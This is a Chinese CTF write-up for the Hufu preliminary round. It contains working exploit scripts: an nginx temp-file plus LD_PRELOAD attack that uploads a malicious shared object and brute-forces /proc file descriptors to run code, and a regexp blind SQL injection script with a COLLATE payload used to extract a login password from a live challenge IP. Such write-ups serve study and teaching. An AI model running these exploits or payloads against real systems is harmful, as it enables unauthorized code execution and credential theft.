虎符ctf初赛

java-ezchain

参考文章>
http://novic4.cn/index.php/archives/23.html
https://ha1c9on.top/?p=1973

ezphp

nginx的临时缓存文件配合LD_PRELOAD

参考hxp题解
参考https://tttang.com/archive/1384/

exp

from threading
import Thread
import requests
import socket
import time
port = 8020
host = "ip"
def do_so():
    data = open("evil.so", "rb").read()

    packet = f"""POST /index.php HTTP/1.1\r\nHOST:{host}:{port}\r\nContent-Length:{len(data)+11}\r\n\r\n"""
    packet = packet.encode()
    
    packet += data
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.sendall(packet)
    time.sleep(10)
    s.close()
if __name__ == "__main__":
	do_so()

fd爆破

import requests
from threading import Thread
port = 8020
host = "ip"
def ldload(pid, fd):
     sopath = f"/proc/{pid}/fd/{fd}"
     # print(sopath)
     r = requests.get(f"http://{host}:{port}/index.php", params={"env":f"LD_PRELOAD={sopath}"})
     return r
if __name__ == "__main__":
 # ldload(20, 20)
 for pid in range(12, 40):
     for fd in range(1, 40):
         t = Thread(target=ldload, args=(pid, fd))
         t.start()

chain

regexp配合短路与进行盲注。得到密码后对大小写进行爆破。

import requests
import time
import json
import string
url = "http://47.107.231.226:20155/login"

s = requests.session()
result= ''
password = 'm'
# m52fpldxyylb++^
# M52fpLdxyYlB++  M52fpLdxyYlB  52fpLdxyYlB
# m52fpldxyylb^eizar!8gxH$
# M52fpLdxyYlB^eizAR!8gxH$
#qay8tefyzc67aeoo  qay8tEFYZc67aeoO
#qay8tEFYZc67aeoO
#  \\\\! \\\\@ \\\\$ \\\\% \\\\^ \\\\&  \\\\_ \\\\+
str = string.ascii_letters + string.digits + "!\@%^&_+$"
print(str)
while(True):
    for i in str:
        if i in "!\@$%^&_+":
            i = '\\' +'\\' + i
        # if i in "#()*+,-.;?":
        #     continue
        test = password +i

        data =    "username=fdfd'or`password`regexp'^" + test + "'or`password`regexp'^[&password=123"
        res = s.post(url,data,headers={"Content-Type":"application/x-www-form-urlencoded"})
        # print(res.request.body)
        # print(res.status_code)
        # print("fdfd'or`password`regexp'^'"+  test +"or`password`regexp'^[")
        # print("fdfd'or`password`regexp'^{}'or`password`regexp'^[".format(chr(i)))
        if res.status_code ==401:
            result +=i
            password = password +i
            print(password)
            continue

但是这样无法区别大小写所以还得爆破大小写登录，官方wp里面使用的是整数溢出触发错误+COLLATE'utf8mb4_bin或COLLATE'utf8mb4_0900_as_cs来区别大小写
payload

username=b'||`password`COLLATE'utf8mb4_0900_as_cs'like'm52F§6§%'&&`id`='1'||`password`regexp'[&password=1